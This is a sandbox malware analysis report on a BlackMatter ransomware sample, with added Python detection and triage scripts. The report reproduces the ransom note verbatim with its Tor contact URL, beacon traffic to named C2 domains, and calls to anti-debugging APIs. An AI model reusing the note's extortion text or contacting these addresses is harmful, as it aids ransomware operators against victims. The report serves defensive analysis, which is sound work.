Source: global traffic | HTTP traffic detected: GET /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-245b-b16a-e897805eb3ba HTTP/1.1; Accept: */*; Connection: keep-alive; Accept-Encoding: gzip, deflate, br; User-Agent: Chrome/91.0.4472.77; Cache-Control: no-cache; Host: ww25.paymenthacks.com; Cookie: __tad=1635060084.7055840; parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf
Source: global traffic | HTTP traffic detected: GET /?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=KKD&Ww7uium=7kQVlcMRI0lz9zF5N&EOj3TrEzg=uXPRgqL6AtVMT&jOg2Kq=KbU1&OJqem=QGXs&Thxw591w=7AzVv38Ty&3Kwha=7J4&3JE702D5H=wVwVW&xj6Km=eIvB77L1DiRICecfvT&rn2cJrZbK=y6u&Wl1Wj=VXl8HkHvD8h6WgygV&jiC4MKl=PC3nWpKyNJUHfNNY&YdDNI5U=qZiZI0BeoLfimdx&DjiEcu=20b4Hh8Ch5v&tz2REARJ=zwNqtxhKtQaEpGWtM&subid1=20211024-1821-5994-88c3-3f09ef5a5c59 HTTP/1.1; Accept: */*; Connection: keep-alive; Accept-Encoding: gzip, deflate, br; User-Agent: AppleWebKit/587.38 (KHTML, like Gecko); Cache-Control: no-cache; Host: ww25.paymenthacks.com; Cookie: __tad=1635060084.7055840; parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf
Source: global traffic | HTTP traffic detected: GET /?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=KKD&Ww7uium=7kQVlcMRI0lz9zF5N&EOj3TrEzg=uXPRgqL6AtVMT&jOg2Kq=KbU1&OJqem=QGXs&Thxw591w=7AzVv38Ty&3Kwha=7J4&3JE702D5H=wVwVW&xj6Km=eIvB77L1DiRICecfvT&rn2cJrZbK=y6u&Wl1Wj=VXl8HkHvD8h6WgygV&jiC4MKl=PC3nWpKyNJUHfNNY&YdDNI5U=qZiZI0BeoLfimdx&DjiEcu=20b4Hh8Ch5v&tz2REARJ=zwNqtxhKtQaEpGWtM&subid1=20211024-1822-00f0-90ca-3541d116f917 HTTP/1.1; Accept: */*; Connection: keep-alive; Accept-Encoding: gzip, deflate, br; User-Agent: AppleWebKit/587.38 (KHTML, like Gecko); Cache-Control: no-cache; Host: ww25.paymenthacks.com; Cookie: __tad=1635060084.7055840; parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf
Source: unknown | HTTPS traffic detected: 103.224.212.222:443 -> 192.168.2.3:49755 version: TLS 1.2
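Two things in the HTTP rows above are worth encoding as detections. First, both User-Agent values ("Chrome/91.0.4472.77" and "AppleWebKit/587.38 (KHTML, like Gecko)") are fragments without the Mozilla/5.0 prefix that every mainstream browser sends. Second, the beacon is a POST of text/plain to the site root with a query string made of random keys and values. The answers came from ww25.paymenthacks.com with a parking_session cookie, and the ASN listed above belongs to Trellian, a domain-parking operator, so the domain was parked at analysis time and the 816-byte POST body never reached the operators. The script below is an added example, not part of the Joe Sandbox report: it parses constructed raw requests modelled on the rows above (headers one per line, as on the wire) plus one benign control, and returns the reasons each request trips, including a parked-domain marker so an analyst does not mistake parking traffic for live C2. The C2 domain set comes from the extracted configuration; the rule names and thresholds are this example's own.

```python
"""Flag BlackMatter-style HTTP beacons in captured requests.

Added example, not code from the Joe Sandbox report. The three requests
below are constructed: two are rebuilt from the report's own request rows
(headers written one per line, as on the wire), the third is a benign
control. The C2 domain list comes from the extracted configuration.
"""
import re
from urllib.parse import urlsplit, parse_qsl

C2_DOMAINS = {"paymenthacks.com", "mojobiden.com"}

# Constructed sample input modelled on the report's traffic.
BEACON_POST = (
    "POST /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg"
    "&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S"
    "&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK HTTP/1.1\r\n"
    "Accept: */*\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate, br\r\n"
    "Content-Type: text/plain\r\nUser-Agent: Chrome/91.0.4472.77\r\n"
    "Host: paymenthacks.com\r\nContent-Length: 816\r\nCache-Control: no-cache\r\n\r\n"
)
PARKED_GET = (
    "GET /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg"
    "&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S"
    "&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-244d-afd2-7f2406ac953a HTTP/1.1\r\n"
    "Accept: */*\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate, br\r\n"
    "User-Agent: Chrome/91.0.4472.77\r\nCache-Control: no-cache\r\n"
    "Host: ww25.paymenthacks.com\r\nCookie: __tad=1635060084.7055840\r\n\r\n"
)
BENIGN_GET = (
    "GET /search?q=blackmatter HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\r\nAccept: */*\r\n\r\n"
)

# Keys/values made only of letters, digits and dashes, as in the beacon.
RANDOM_TOKEN = re.compile(r"^[A-Za-z0-9-]+$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query pairs and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {
        "method": method,
        "path": parts.path,
        "query": parse_qsl(parts.query, keep_blank_values=True),
        "headers": headers,
    }


def in_c2_domains(host, domains):
    """True for the domain itself or any subdomain (ww25.paymenthacks.com)."""
    host = host.lower().split(":")[0]
    return any(host == d or host.endswith("." + d) for d in domains)


def suspicious_reasons(req, domains=C2_DOMAINS):
    """Return the rules the request trips, in a fixed order (empty = clean)."""
    h = req["headers"]
    reasons = []
    host = h.get("host", "")
    cookie = h.get("cookie", "")
    if in_c2_domains(host, domains):
        reasons.append("host-matches-c2-domain")
    # Parking services answer on a ww25. host and set parking cookies; this is
    # not live C2 and should be triaged as "domain sinkholed/parked".
    if host.startswith("ww25.") or "parking_session" in cookie or "__tad=" in cookie:
        reasons.append("parked-domain-not-live-c2")
    ua = h.get("user-agent", "")
    if ua and not ua.startswith("Mozilla/"):
        reasons.append("user-agent-lacks-mozilla-prefix")
    if (req["method"] == "POST" and req["path"] == "/"
            and h.get("content-type", "").startswith("text/plain")):
        reasons.append("post-text-plain-to-root")
    q = req["query"]
    if len(q) >= 5 and all(RANDOM_TOKEN.match(k) and RANDOM_TOKEN.match(v) for k, v in q):
        reasons.append("random-query-string")
    return reasons


def scan(raw_requests, domains=C2_DOMAINS):
    """Reasons per request; callers alert on any non-empty list."""
    return [suspicious_reasons(parse_request(r), domains) for r in raw_requests]


if __name__ == "__main__":
    for name, raw in [("beacon POST", BEACON_POST), ("parked GET", PARKED_GET),
                      ("benign GET", BENIGN_GET)]:
        print(f"{name}: {suspicious_reasons(parse_request(raw))}")
```

The User-Agent and query-shape rules fire without any domain knowledge, which is what matters once the affiliate rotates domains; the domain rule is the cheap, high-confidence one while paymenthacks.com and mojobiden.com are still in the ET rule set.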

          Spam, unwanted Advertisements and Ransom Demands:

          barindex
          Found ransom note / readmeShow sources
          Source: C:\Users\user\Videos\kVuoJyeoW.README.txtDropped file: ~+ * + ' BLACK | () .-.,='``'=. - o - '=/_ \ | * | '=._ | \ `=./`, ' . '=.__.=' `=' * + Matter + O * ' .>>> What happens? Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver. We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.>>> What guarantees? We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. We always keep our promises.>> Data leak includes1. Full emloyeers personal data2. Network information3. Schemes of buildings, active project information, architect details and contracts, 4. Finance info>>> How to contact with us? 1. Download and install TOR Browser (https://www.torproject.org/). 2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV. >>> Warning! Recovery recommendations. We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them.Jump to dropped file
          Yara detected BLACKMatter RansomwareShow sources
          Source: Yara matchFile source: 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.279421242.00000000012FC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.359933097.00000000012FF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: GlLHM7paoZ.exe PID: 4540, type: MEMORYSTR
          Changes the wallpaper pictureShow sources
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeKey value created or modified: HKEY_CURRENT_USER\Control Panel\Desktop WallPaper C:\ProgramData\kVuoJyeoW.bmpJump to behavior
          Modifies existing user documents (likely ransomware behavior)Show sources
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docxJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.xlsxJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpgJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\EWZCVGNOWT.pngJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\BNAGMGSPLO.jpgJump to behavior
          Writes a notice file (html or txt) to demand a ransomShow sources
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File dropped: C:\Users\user\Videos\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File dropped: C:\Users\user\Saved Games\kVuoJyeoW.README.txt -> (identical note text)
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File dropped: C:\Users\user\Desktop\LSBIHQFDVT\kVuoJyeoW.README.txt -> (identical note text)
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File dropped: C:\Users\user\Searches\kVuoJyeoW.README.txt -> (identical note text)
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File dropped: C:\Users\user\Documents\PIVFAGEAAV\kVuoJyeoW.README.txt -> (identical note text)
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File dropped: C:\Users\user\Desktop\QCFWYSKMHA\kVuoJyeoW.README.txt -> (identical note text)
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File dropped: C:\Users\user\Documents\DUUDTUBZFW\kVuoJyeoW.README.txt -> (identical note text)
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File dropped: C:\Users\user\Documents\GIGIYTFFYT\kVuoJyeoW.README.txt -> (identical note text)
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File dropped: C:\Users\user\Desktop\BNAGMGSPLO\kVuoJyeoW.README.txt -> (identical note text)
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File dropped: C:\Users\user\Contacts\kVuoJyeoW.README.txt -> (identical note text)
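The notes above all carry one filename, kVuoJyeoW.README.txt, and the same tag appears in the wallpaper value C:\ProgramData\kVuoJyeoW.bmp, so a single note found on a host pins down the wallpaper indicator and the .onion contact URL at once. The following Python triage script is an added example, not code from the sandbox report or from the sample: it walks a directory tree for *.README.txt notes, extracts .onion URLs (dropping the sentence period the note places right after the URL), groups notes by tag, derives the wallpaper path the report shows for that tag, and on Windows compares it with the HKCU\Control Panel\Desktop\WallPaper value. The sample note is a constructed excerpt of the dropped file text shown above; the function names and the temporary demo tree are mine.

```python
"""Triage helper: find ransom notes, pull contact URLs, derive the wallpaper IOC.

Added example; not code from the sandbox report or from the sample.
"""
import os
import re
import sys
import tempfile
from collections import defaultdict

NOTE_SUFFIX = ".README.txt"          # note name seen in the report: <tag>.README.txt
WALLPAPER_DIR = r"C:\ProgramData"    # wallpaper dropped as <tag>.bmp in this directory

# v3 (56 chars) or v2 (16 chars) base32 onion hostname, optional path.
ONION_RE = re.compile(
    r"https?://(?:[a-z2-7]{56}|[a-z2-7]{16})\.onion(?:/[^\s\"'<>]*)?", re.IGNORECASE
)

# Constructed excerpt of the note text the report shows; used by run_demo().
SAMPLE_NOTE = (
    ">>> how to contact with us? 1. download and install tor browser "
    "(https://www.torproject.org/). 2. open "
    "http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/"
    "7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations."
)


def extract_onion_urls(text):
    """Unique .onion URLs in a note, minus trailing sentence punctuation."""
    urls = {m.group(0).rstrip(".,;:)") for m in ONION_RE.finditer(text)}
    return sorted(urls)


def note_tag(path):
    """'C:\\Users\\user\\Videos\\kVuoJyeoW.README.txt' -> 'kVuoJyeoW' (either separator)."""
    return re.split(r"[\\/]", path)[-1][: -len(NOTE_SUFFIX)]


def hunt_notes(root):
    """Walk root; map each note tag to its note paths and contact URLs."""
    found = defaultdict(lambda: {"notes": [], "onion_urls": set()})
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(NOTE_SUFFIX) or name == NOTE_SUFFIX:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # locked or unreadable: skip it, keep hunting
            entry = found[note_tag(path)]
            entry["notes"].append(path)
            entry["onion_urls"].update(extract_onion_urls(text))
    return {tag: {"notes": sorted(v["notes"]), "onion_urls": sorted(v["onion_urls"])}
            for tag, v in found.items()}


def expected_wallpaper(tag):
    """Wallpaper path the report shows for a given note tag."""
    return WALLPAPER_DIR + "\\" + tag + ".bmp"


def current_wallpaper():
    """HKCU\\Control Panel\\Desktop\\WallPaper, or None off Windows / if unset."""
    if sys.platform != "win32":
        return None
    import winreg  # Windows-only module, imported lazily
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Control Panel\Desktop") as key:
            value, _type = winreg.QueryValueEx(key, "WallPaper")
            return value
    except OSError:
        return None


def wallpaper_matches(tag, value):
    """True if a WallPaper value equals the path the report shows for this tag."""
    return value is not None and value.lower() == expected_wallpaper(tag).lower()


def run_demo():
    """Build a constructed profile tree (two notes, one decoy file) and hunt it."""
    root = tempfile.mkdtemp(prefix="bm_triage_")
    for sub in ("Videos", os.path.join("Documents", "PIVFAGEAAV")):
        os.makedirs(os.path.join(root, sub))
        with open(os.path.join(root, sub, "kVuoJyeoW" + NOTE_SUFFIX), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_NOTE)
    with open(os.path.join(root, "notes.txt"), "w", encoding="utf-8") as fh:
        fh.write("ordinary text file, no contact URL")  # decoy: must not match
    return hunt_notes(root)


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else None
    result = hunt_notes(root) if root else run_demo()
    for tag, info in result.items():
        print(f"tag {tag}: {len(info['notes'])} note(s), urls {info['onion_urls']}")
        print(f"  expected wallpaper: {expected_wallpaper(tag)}")
        print(f"  wallpaper value matches: {wallpaper_matches(tag, current_wallpaper())}")
```

On a suspect host run it as `python triage.py C:\Users`; without an argument it runs against the constructed tree. The wallpaper check is the cheap confirmation: the report shows the same tag in the note name and in the .bmp path, so a mismatch means either a different victim id or a partially completed run.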

          System Summary:

Malicious sample detected (through community Yara rule)
Source: GlLHM7paoZ.exe, type: SAMPLE | Matched rule: Detect BlackMatter ransomware, author: Arkbird_SOLG
Source: 0.2.GlLHM7paoZ.exe.10f0000.0.unpack, type: UNPACKEDPE | Matched rule: Detect BlackMatter ransomware, author: Arkbird_SOLG
Source: 0.0.GlLHM7paoZ.exe.10f0000.0.unpack, type: UNPACKEDPE | Matched rule: Detect BlackMatter ransomware, author: Arkbird_SOLG
Source: GlLHM7paoZ.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: GlLHM7paoZ.exe, type: SAMPLE | Matched rule: RAN_BlackMatter_Aug_2021_1 (date = 2021-08-02, author = Arkbird_SOLG, description = Detect BlackMatter ransomware, level = Experimental, adversary = -, reference = https://twitter.com/abuse_ch/status/1421834305416933376, tlp = white, hash1 = 22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6, hash2 = 7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984)
Source: 0.2.GlLHM7paoZ.exe.10f0000.0.unpack, type: UNPACKEDPE | Matched rule: RAN_BlackMatter_Aug_2021_1 (same metadata as above)
Source: 0.0.GlLHM7paoZ.exe.10f0000.0.unpack, type: UNPACKEDPE | Matched rule: RAN_BlackMatter_Aug_2021_1 (same metadata as above)
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F51E8
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F207C
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F4CD8
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F4CD3
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F890B CreateThread,ResumeThread,GetExitCodeThread,NtClose
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F9F23 RegCreateKeyExW,RegQueryValueExW,NtClose
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F7F4C NtClose
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F9554 NtSetInformationProcess,NtSetInformationProcess
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F8766 NtSetInformationThread
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F6393 NtQueryInformationToken
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010FB790 CreateThread,NtClose
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F73C1 NtQuerySystemInformation
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F6245 RegCreateKeyExW,RegQueryValueExW,NtClose
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F9494 NtQueryInformationToken
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F7EA7 NtQuerySystemInformation
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F92E1 NtSetInformationThread
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F73F3 NtQuerySystemInformation
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F740C NtQuerySystemInformation
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F7EE0 NtQuerySystemInformation
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F7EF9 NtQuerySystemInformation
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F8DC6 FindFirstVolumeW,GetVolumePathNamesForVolumeNameW,GetDriveTypeW,CreateFileW,DeviceIoControl
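The lines above name each resolved function by its sandbox id (pid_run_address) followed by the APIs it calls; in the extracted text the id is often repeated after the API list and glued to the preceding cell. The following Python helper is an added example, not code from the report or from the sample: it parses such lines in either form, groups the functions by API family (the NtSetInformationThread/NtSetInformationProcess calls, which are the ones used to hide a thread from a debugger although the information class is not in these lines and has to be confirmed at the address; the FindFirstVolumeW to DeviceIoControl chain; token, system and registry queries), and turns each address into a module-relative WinDbg breakpoint, because the image is ASLR-enabled (DYNAMIC_BASE) and the 0x010F0000 base seen in this run (the 10f0000 in the unpack names) will not hold on another machine. The sample lines are copied from this report; the family names, the module name GlLHM7paoZ and the base address are my assumptions.

```python
"""Parse Joe Sandbox 'Code function' lines into addresses, APIs and WinDbg breakpoints.

Added example; not code from the sandbox report or from the sample.
"""
import re

IMAGE_BASE = 0x010F0000   # base seen in this run (assumed from the 10f0000 unpack name)
MODULE = "GlLHM7paoZ"      # WinDbg module name: image file name without extension

# id = <pid>_<run>_<8 hex digits>; the extracted text may repeat the id after the API list.
LINE_RE = re.compile(r"Code function:\s*(?P<fid>\d+_\d+_(?P<addr>[0-9A-Fa-f]{8}))(?P<rest>.*)$")

FAMILIES = {
    "thread_process_info": {"NtSetInformationThread", "NtSetInformationProcess"},
    "volume_enumeration": {"FindFirstVolumeW", "GetVolumePathNamesForVolumeNameW",
                           "GetDriveTypeW", "DeviceIoControl"},
    "token_query": {"NtQueryInformationToken"},
    "system_query": {"NtQuerySystemInformation"},
    "registry": {"RegCreateKeyExW", "RegQueryValueExW"},
    "threads": {"CreateThread", "ResumeThread", "GetExitCodeThread"},
}

# Constructed input: a subset of this report's lines, in the garbled and the cleaned form.
SAMPLE_REPORT = r"""
Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F51E80_2_010F51E8
Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F890B CreateThread,ResumeThread,GetExitCodeThread,NtClose,0_2_010F890B
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F9554 NtSetInformationProcess,NtSetInformationProcess
Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F8766 NtSetInformationThread,0_2_010F8766
Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F6393 NtQueryInformationToken,0_2_010F6393
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F92E1 NtSetInformationThread
Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F8DC6: FindFirstVolumeW,GetVolumePathNamesForVolumeNameW,GetDriveTypeW,CreateFileW,DeviceIoControl,0_2_010F8DC6
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Process token adjusted: Security
"""


def parse_code_functions(text):
    """One dict per 'Code function' line: id, absolute address, de-duplicated API list."""
    functions = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        fid = m.group("fid")
        rest = m.group("rest").replace(fid, "")   # drop the repeated trailing id
        apis = []
        for name in re.split(r"[,\s:]+", rest):
            if name and name not in apis:          # keep call order, drop repeats
                apis.append(name)
        functions.append({"id": fid, "addr": int(m.group("addr"), 16), "apis": apis})
    return functions


def classify(functions):
    """Map each API family to the ids that call it; list ids with no resolved API."""
    hits = {family: [] for family in FAMILIES}
    hits["no_api_resolved"] = []
    for f in functions:
        if not f["apis"]:
            hits["no_api_resolved"].append(f["id"])
            continue
        called = set(f["apis"])
        for family, names in FAMILIES.items():
            if called & names:
                hits[family].append(f["id"])
    return hits


def to_rva(addr, base=IMAGE_BASE):
    """Image-relative offset; valid regardless of where ASLR loads the module."""
    return addr - base


def windbg_breakpoints(functions, hits, family, module=MODULE):
    """Module-relative 'bp module+offset' lines for every function in a family."""
    by_id = {f["id"]: f for f in functions}
    return [f"bp {module}+0x{to_rva(by_id[fid]['addr']):x}" for fid in hits[family]]


if __name__ == "__main__":
    funcs = parse_code_functions(SAMPLE_REPORT)
    hits = classify(funcs)
    for family, ids in hits.items():
        if ids:
            print(f"{family}: {', '.join(ids)}")
    print("\n".join(windbg_breakpoints(funcs, hits, "thread_process_info")))
```

Feed it the report's own export instead of SAMPLE_REPORT to get the full list; the functions with no resolved API (0_2_010F51E8 and its neighbours above) are the ones to open first in a disassembler, since they are the ones the report could not name.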
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Process token adjusted: Security
Source: GlLHM7paoZ.exe | Static PE information: Section: .rsrc, ZLIB complexity 0.990792410714 (near-incompressible, i.e. high-entropy resource data)
Source: GlLHM7paoZ.exe | Virustotal: Detection: 86%
Source: GlLHM7paoZ.exe | Metadefender: Detection: 77%
Source: GlLHM7paoZ.exe | ReversingLabs: Detection: 92%
Source: GlLHM7paoZ.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\InprocServer32
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File created: C:\Users\kVuoJyeoW.README.txt
Source: classification engine | Classification label: mal100.rans.evad.winEXE@1/176@6/2
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Code function: 0_2_010F8C6E GetDiskFreeSpaceExW
Source: GlLHM7paoZ.exe | Joe Sandbox Cloud Basic: Detection: clean, Score: 0
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\d2c777569925c4c22958338e72708f92
Source: C:\Users\user\Desktop\GlLHM7paoZ.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 occurrences)
Source: GlLHM7paoZ.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: GlLHM7paoZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG